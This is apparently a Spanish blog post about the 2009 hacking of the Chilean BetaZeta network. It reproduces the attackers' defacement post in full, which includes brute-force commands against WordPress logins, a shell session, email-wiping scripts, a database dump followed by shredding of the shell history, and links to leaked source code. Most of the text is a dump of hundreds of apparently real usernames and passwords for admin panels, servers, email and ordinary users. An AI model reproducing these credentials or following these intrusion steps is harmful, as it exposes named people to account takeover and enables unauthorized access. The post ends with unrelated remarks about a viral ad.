Hace un par de horas aproximadamente, el blog chileno sobre tecnología habría sido hackeado. Como se puede ver en la captura de pantalla del blog que en estos momentos se encuentra caído.

Pero este blog no es el único que fuera hackeado, la misma suerte han corrido el resto de blogs de esa red.

http://www.betazeta.com

http://www.fayerwayer.com

http://www.theclinic.cl

http://www.saborizante.cl

http://leo.prieto.cl

http://www.betaid.org

http://www.wayerless.com

http://www.niubie.com

http://www.botonturbo.com

http://www.tecnosquad.com

http://www.chw.net

http://www.zetacorp.net

http://www.zimio.com

http://www.i2b.cl

Los responsables de haber hackeado este blog fueron los denominados “teletubbies”, quienes no solo hicieron burla de la poca seguridad en las contraseñas, las cuales en su mayoría solo tienen letras, sino que además las divulgaron en el mismo blog. Los métodos utilizados para recuperar la contraseña de los administradores fueron el de fuerza bruta para el primero ya que su contraseña tenía únicamente números y por ataque de diccionario para el segundo. A continuación el post que fuera publicado por el grupo de hackers.

F4Y3RW4Y3R PWN3D
from FayerWayer by WordPress

|||||||||||||||||||||||||||||||||||||||||||||||||||||
[================== 1ns3c gr0up ====================]
[------- t1nky_w1nky - d1psy - l44_l44 - p0 -------]
___________ .___.____ __
\_ _____/ _ \ | | | ________ _____/ |______
| __)/ /_\ \| | | \___ // __ \ __\__ \
| \/ | \ | |___ / /\ ___/| | / __ \_
\___ /\____|__ /___|_______ \/_____ \\___ >__| (____ /
\/ \/ \/ \/ \/ \/

[======================| 0wn3d |=====================]
||||||||||||||||||||||||||||||||||||||||||||||||||||||

/*
* BetaFail (aka BetaZeta aka LoserZeta aka BetaWeeta — thnx chilean dudes ^^)
* is a loser-blogger-network which claims to be experts on technology… so lets see!
*/

]====== 0×00 ======[ Index

[=-0x01-=] Affected domains
[=-0x02-=] Vulnerabilities
[=-0x03-=] Intrussion
[=-0x04-=] Data requesting
[=-0x05-=] Exposure
[=-0x06-=] Extras

——————————————————————————-

]====== 0×01 =======[ Affected Domains
+ The affected domains are:
|- http://www.betazeta.com
|- http://www.fayerwayer.com
|- http://www.theclinic.cl
|- http://www.saborizante.cl
|- http://leo.prieto.cl
|- http://www.betaid.org
|- http://www.wayerless.com
|- http://www.niubie.com
|- http://www.botonturbo.com
|- http://www.tecnosquad.com
|- http://www.chw.net
|- http://www.zetacorp.net
|- http://www.zimio.com
|- http://www.i2b.cl
|_/
-
-------------------------------------------------------------------------------
]====== 0×02 ======[ Vulnerabilities
/*
* So you can ask yourself, how can this be? Easy: if you set a weak
* password you have a weak security, if you store all your accounts in your mail
* you hace a weak security.
* -> JF aka JF10 aka Juan Francisco Diez has a 9 int long password, easy enought to
* been brute forced.
* -> Leo aka Leo Prieto has a 5 char + 3 int password (dictionary password).
* And so on... these dudes really don't know shit about security and lucky for us
* theirs servers were totally open for us (open legs?).
*/

-------------------------------------------------------------------------------
]====== 0×03 ======[ Intrussion
/* Hey ho, lets GO! */

(=| proof-of-concept |=)
/* First get get the silliest password ever from our very best friend JF on any of
* the services he uses: twitter, wordpress, etc.. (yes... really silly but he uses
* the same password for everything!):
*/

[1nf3ct3d@darkside:~]$ cat bruteforce-wordlist |bf -user=jf10 http://www.fayerwayer.com/wp-login.php
|===== expl0iting www.fayerwayer.com ====|
……………………………………………………………………..
……………………………………………………………………..
………………….. FOUND! (2020229)
[1nf3ct3d@darkside:~]$ cat bruteforce-wordlist |bf -user=’leo prieto’ http://www.fayerwayer.com/wp-login.php
|===== expl0iting www.fayerwayer.com ====|
……………………………………………………………………..
……………………………………………………………………..
……………………………………………………………………..
………………………………………….. FOUND! (macoy123)
[1nf3ct3d@darkside:~]$

/* Done. Now, search a prompt: */

[1nf3ct3d@darkside:~]$ telnet fayerwayer.com 37337
Trying 174.132.120.218…
Connected to fayerwayer.com.
Escape character is ‘^]’.
bash$

/* Now we can try with anything… say… gmail: */

[1nf3ct3d@darkside:~]$ ./gmail-delete.py -user jf10 -pass 2020229 http://mail.google.com/a/betazeta.com
Logged in.
Deleting
[================================================================================================] 100%
Changing user password … OK
New password is: HuJucF53

/* Heh! Now lets play with Leo Prieto’s stuff (again… same password almost
* for everything) */

[1nf3ct3d@darkside:~]$ ./gmail-delete.py -user leo -pass macoy123 http://mail.google.com/a/betazeta.com
Logged in.
Deleting
[================================================================================================] 100%
Changing user password … OK
New password is: 4Gh4Fhb
[1nf3ct3d@darkside:~]$

——————————————————————————-
]====== 0×04 ======[ Data requesting
/* Wordpress has been infected ... now waiting for our data */

[1nf3ct3d@darkside:~]$ wget http://www.wayerless.com/wp-content/uploads/2008/12/sheet.jpg -o /dev/null
[1nf3ct3d@darkside:~]$ tail sheet.jpg
user: pass:
user: pass:
user: mr_self-destruct pass: 13587527
user: march3lo pass: marcel
user: mr_self-destruct pass: 88007239
user: mr_self-destruct pass: 88007239
user: sir_lestat pass: martin
user: asdsadfsadf pass: lalalalalala
user: Chok pass: minako
user: successor pass: BWN72HL0
/* Amazing …. */
[1nf3ct3d@darkside:~]$ wc -l sheet.jpg
682 sheet.jpg
[1nf3ct3d@darkside:~]$ wget http://www.botonturbo.com/wp-content/uploads/2007/11/sheet.jpg -o /dev/null -O sheet2.jpg
[1nf3ct3d@darkside:~]$

/* Awesome! For each domain we repeat */

[1nf3ct3d@darkside:~]$ ssh betaid@betaid.org
Password:
betaid@betaid.org:~$ ls
app_error.php app_model.php config controllers htaccess.template httpdocs index.php locale models plugins tests tmp vendors views webroot
betaid@betaid.org:~$ cd config
betaid@betaid.org:~/config$ ls
acl.ini.php betaid.php bootstrap.php chile.sql core.php database.php entelpcs.php inflections.php openid.php routes.php sql
betaid@betaid.org:~$ grep -v \* database.php
class DATABASE_CONFIG {

var $default = array(
‘driver’ => ‘mysql’,
‘persistent’ => false,
‘host’ => ‘localhost’,
‘login’ => ‘betaman’, /* look at this! */
‘password’ => ‘betapass’,
‘database’ => ‘betaid_main’,
‘encoding’=> ‘UTF8′,
‘prefix’ => ”,
);

var $test = array(
‘driver’ => ‘mysql’,
‘persistent’ => false,
‘host’ => ‘localhost’,
‘login’ => ‘user’,
‘password’ => ‘password’,
‘database’ => ‘test_database_name’,
‘prefix’ => ”,
);
}
betaid@betaid.org:~$
/* OMFG! Is a DB_delete_all_my_content password? */

betaid@betaid.org:~$ mysqldump -ubetaman -pbetapass betaid_main >../httpdocs/betaz.sql
betaid@betaid.org:~$ exit
[1nf3ct3d@darkside:~]$ wget http://www.betaid.org/betaz.sql -o /dev/null
[1nf3ct3d@darkside:~]$ ssh betaid@betaid.org “rm -rf httpdocs/betaz.sql && shred .bash_history”
Password:
[1nf3ct3d@darkside:~]$

/* Its time to infect betaid to obtain all data!. We modify controller/auth_controller.php and pump it up */

[1nf3ct3d@darkside:~]$ wget http://www.wayerless.com/wp-content/uploads/2008/11/audi-a3.jpg -o /dev/null
[1nf3ct3d@darkside:~]$ wc -l audi-a3.jpg
262 audi-a3.jpg
[1nf3ct3d@darkside:~]$ tail -5 audi-a3.jpg
user: zector pass: celular
user: chokolat pass: dagchuman
user: andru pass: nenyaa
user: angrod pass: angrod01
user: elmono pass: 15369775
[1nf3ct3d@darkside:~]$ perl http-delete.pl http://www.wayerless.com/wp-content/uploads/2008/11/audi-a3.jpg -u admin
admin’s pwd:
1 file(s) deleted.
[1nf3ct3d@darkside:~]$

——————————————————————————-
]====== 0×05 ======[ Exposure
/* All that you want to see! THE DATA! */
/* Anyone want to twit? */
twitter.com:fayerwayer:f4y3rw4y3rdoesthisshit4realz
vimeo.com:fw@fayerwayer.com:gatoinalambrico

ZeroZen:
mail.google.com/a/zetacorp.net:zerozen:rtr944a5
gmail.com:zeroblogger:rtr944a5
www.google.com/a/betazeta.com:zerozen:rtr944a4

Mail:Pass
jf@betazeta.com:2020229
leo@betazeta.com:macoy123

http://wayerless.com

user:sebastian pass: elantro2008
user:rodrigo pass: rcaceres29
user:juaqion pass: kilometro
user: rodrigo pass: rcaceres29
user: admin pass: gatosinalambricos
user: frajola pass: 375hb5

FayerWayer:
user: rodrigo pass: rcaceres29
user: admin pass:gatosinalambricos
user: frajola pass:375hb5
user: JF10 pass:2020229
user: sebastian pass:elantro2008
user: carlos pass:betagato88
user: Amenadiel pass:parafern
user: hugo pass:gatos
user: admin pass:DFeu78x8
user: i2b pass:gatoadministrador
user: diego pass:77N569
user: leo prieto pass:macoy123
user: diego pass:77N569
user: Diego pass:77N569
user: diego pass:77N569
user: ZeroZen pass:rtr944a5
user: carlos pass:120977xs
user: Ultraviolet pass:qazxcde
user: FelipeLang pass:5253J3
user: Ultraviolet pass:nosoygay1985
user: eft0 pass:estebangato
user: eft0@zetacorp pass:rocka.one

DB user fayerwayer
DB pass MysqlFayerwayer80

user: mr.chips pass:jurassic1410
user: mr. chips pass:jurassic1410
user: mr. chips pass:aschek
user: mr. chips pass:aschek61124
user: mr. chips pass:jurassic
user: mr. chips pass:1410
user: mr. chips pass:jurassic1410
user: mr.chips pass:jurassic
user: mr.chips pass:jurassic1410
user: mr.chips pass:aschek61124
user: mr.chips pass:jurassic
user: mr.chips pass:61124
user: mr. chips pass:aschek
user: mr. chips pass:aschek61124
user: mr. chips pass:jurassic
user: mr. chips pass:jurassic1410
user: mr. chips pass:1410
user: mr. chips pass:61124
user: Boxbyte pass:4ping2pong
user: admin pass:DFeu78x8
user: leoprieto@gmail.com pass: macoy123

URL: http://69.89.21.73:2082/frontend/bluehost/index.html
user: itwobcl
pass: 1ee2dos2veh1

FTP
IP: 69.89.21.73
User: itwobcl
Pass: 1ee2dos2veh1
---
Jabber
User: esteban@hs.i2b.cl
Pass: efernandez47

Mail
SMTP: smtp.i2b.cl
Port: 587
POP: pop.i2b.cl
Port: 110
User and account: esteban.fernandez@i2b.cl
Pass: efernandez47
---
Customer #: 18766006
Simple Control Panel
URL: https://72.167.52.30:9999
User: zetacorp
Pass: DFeu78x8

phpmyadmin
URL: http://72.167.52.30/phpMyAdmin
User: root
Pass: DFeu78x8

SSH
IP: 72.167.52.30
User: zetacorp
Pass: DFeu78x8

Admin WP

http://www.fayerwayer.com/wp-admin

User: admin
Pass: DFeu78x8

Admin Limesurvey

http://www.fayerwayer.com/limesurvey/admin

User: admin
Pass: DFeu78x8

MySQL
User: root
Pass: DFeu78x8

Backup
IP: 208.109.188.17
User: zetacorp
Pass: DFeu78x8

PIX

https://72.167.52.79/

User: zetacorp
Pass: DFeu78x8

ftp FW
Host: fayerwayer.i2b.cl
User: fayerwayer
Pass: X6597Z4E

i2b
URL: www.bluehost.com
User: i2b.cl
Pass: 1ee2dos2veh1

FTP ablog.i2b.cl
Host: 69.89.21.73
User: itwobcl
Pass: 1ee2dos2veh1
Root Blog: /public_html/blog/

http://www.betazeta.com/wp-admin/

User: admin
Pass: betazeta2k8

zimio.com (SCP)
User: zimio
Pass: 57MQ3LYP

betazeta.com
FTP
User: betazeta
Pass: 89428V5V

wayerless.com
FTP
User: wayerless
Pass: VGJT5983

zetacorp.net
FTP
User: zetacorp
Pass: G7UCCLW9

Plesk
URL: https://64.13.250.71:8443
Username:admin
Password:aAmigos

SSH
Host: saborizante.com
User: efernadez
Pass: efernandez47

Root
Pass: markymark2001

Sites
Path: /var/www/vhosts/dominio

User name: eft0
Password : betazeta

http://betazetanet.seework.com

http://devwayerles.i2b.cl

Username: admin
Password: mf*8kRE5PyFp

BetaID
user: lpinto pass: qwerty
user: perovi pass: paularos
user: nestorcarrasco pass: nintendo
user: volkova pass: yulia
user: melkorazo pass: MlkrZ123be
user: melkorazo pass: MlkrZ123be
user: patofuqs pass: olomongolo15
user: patofuqs pass: villarevans22
user: patofuqs pass: olomongolo15
user: patofuqs pass: villarevans22
user: gagoner pass: olzue2iq
user: claudiomix pass: clamiranda
user: Vidal pass: betacueva
user: vidal pass: betacueva
user: lorena pass: k4m3l30n
user: Polin pass: 4815162342
user: derangedwolf pass: ronsilver
user: darkoy pass: maniac
user: darkjano pass: 29111979
user: hetnet pass: 486Es30
user: hetnet pass: 486Es30
user: nivyii pass: darkmaskmas
user: nivyii pass: darkmas
user: serroba pass: sm293arias
user: don juan pass: 300309144
user: donjuan pass: 300309144
user: grouchomarx pass: catolica
user: grouchomarx pass: cato
user: Evadix pass: casera
user: doruku pass: welltall01
user: neuroshark pass: cassiopeia
user: neuroshark pass: cassiopeia
user: andyolivares pass: tgs6ae8103
user: andyolivares pass: tgs6ae8103
user: firexcool pass: belmont5
user: noquierouser pass: msn728843
user: Ecodrive pass: QAZ.8680
user: ecodrive pass: QAZ.8680
user: masteralfe pass: 300km/h
user: Juako pass: kirk.8130
user: talkover pass: navidad7
user: davidqs pass: 2201
user: Thefx pass: frasco1
user: thefx pass: frasco1
user: sprite pass: 98485238
user: nachx00 pass: YufFmNow
user: nachx00 pass: shithappens
user: pass: shitit
user: vagrant pass: p4nch0
user: forbidden pass: fuckyou0
user: payazo pass: panchobeta
user: mescalier pass: retinalcircus
user: ruffox pass: mikehamuert0
user: khalebd pass: mibebe
user: fako85 pass: 4725781
user: patus pass: ernesto
user: jorge pass: aktive123
user: dsalgado pass: paranoid
user: joseph pass: amariloo
user: joseph pass: amarillo
user: manuel pass: man16812
user: suikakuyu pass: voyaserpro
user: suikakuyu pass: voyaserpro
user: eduardo pass: Strategyc
user: paz pass: humbert
user: paz pass: humbert
user: dickinsonh2k pass: 374357787
user: clarkxp pass: ccom2k1
user: laura pass: carolita
user: Marmota pass: marmota1988
user: zirex pass: ignacio16
user: chinito46 pass: 82002523
user: lukas pass: jibarizado
user: lukas pass: salpimentar
user: Esperpento pass: jibarizado
user: rvs pass: thervsbrothers
user: davdor pass: thebeatles00
user: kmepartaunrayo pass: computadora
user: hiroki pass: warq69
user: jf10 pass: 1234
user: ail pass: Zektorj4j4
user: JanoMac pass: 998917850
user: eldarberserker pass: v4lh4ll4
user: Nanolethal pass: nosferatu
user: necrox pass: 1nacho
user: rkstro pass: 656565rod
user: Elias pass: amanda1806
user: antony pass: 12345abcde+
user: turbomaster pass: miguel
user: turbomaster pass: miguel
user: turbomaster pass: asdqwe
user: Foxtrot pass: cygnus2112
user: vortex pass: g0dz1ll4
user: vortex pass: g0dz1ll4
user: francofa pass: hardcore1
user: saint pass: c0rps41nt
user: wurrzag pass: bici6luz
user: wurrzag pass: mN4awyc9
user: wurrzag pass: uz1d8kbe
user: wurrzag pass: pera6luz
user: infositio pass: piporrin
user: camilo_dxmg@live pass: celular
user: zector pass: celular
user: chokolat pass: dagchuman
user: andru pass: nenyaa
user: angrod pass: angrod01
user: elmono pass: 15369775

-------------------------------------------------------------------------------
]====== 0×06 ======[ Extras
/* Do you remember when CHW was erradicated?
* Oh wait. Remember bootlog too?
* — That’s was the OPPORTUNITY which BetaZeta has to set a REAL security-policy
*
* Wanna download the betaid source code? Here:
*
* http://rapidshare.com/files/254417420/betaid.org.zip.html
* http://www.megaupload.com/?d=8FT5KYTP
*
*
* Direct message to JF: Be more humble, piece of shit.
* Seeya in the next issue!
*/

/* Dud3s! Y0u’ve been pwn3d by teletubbies! */

EOF

Entrando a ver el top 20 de los videos más virales me encontré la publicidad de una conocida marca de agua, Evian, vean la publicidad que está simpática y a la fecha tiene alrededor de 9 millones de visualizaciones en apenas una semana.

Esta foto la encontré en un fotolog y solo me queda decir que el parecido es increíble.